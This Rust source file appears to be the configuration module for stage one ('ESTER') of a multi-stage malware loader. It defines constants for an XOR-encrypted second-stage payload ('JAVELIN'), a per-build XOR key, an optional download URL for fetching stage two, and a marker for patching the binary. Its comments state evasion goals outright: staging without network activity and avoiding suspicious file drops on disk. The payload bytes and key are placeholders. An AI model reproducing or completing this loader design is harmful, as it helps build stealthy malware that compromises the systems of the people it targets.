//! Configuration for Stage 1 (ESTER)
//!
//! This module contains embedded configuration for triggering Stage 2.
//! The JAVELIN payload is embedded here in encrypted form.

/// Embedded JAVELIN (Stage 2) payload - XOR encrypted
/// This is generated by the builder and embedded at compile time
/// 
/// **Why embedded here**:
/// - Allows ESTER to trigger JAVELIN without network activity
/// - Single executable deployment
/// - No suspicious file drops on disk
pub const ENCRYPTED_JAVELIN: &[u8] = &[
    // Placeholder - will be replaced by builder
    // In real deployment, this contains XOR-encrypted JAVELIN loader
    0x00,
];

/// XOR key for decrypting JAVELIN payload
/// Generated randomly for each build by the builder
pub const JAVELIN_XOR_KEY: &[u8] = b"PLACEHOLDER_KEY_32_BYTES_RANDOM!";

/// Alternative: Stage 2 location for download-based staging
/// If ENCRYPTED_JAVELIN is empty, ESTER can download Stage 2 from this URL
/// This is less stealthy but provides flexibility
pub const JAVELIN_DOWNLOAD_URL: &str = "";

/// Configuration marker for binary patching
#[used]
#[no_mangle]
pub static STAGE_CONFIG_MARKER: &[u8; 32] = b"C2R2_STAGE1_CONFIG_MARKER___\0\0\0\0";
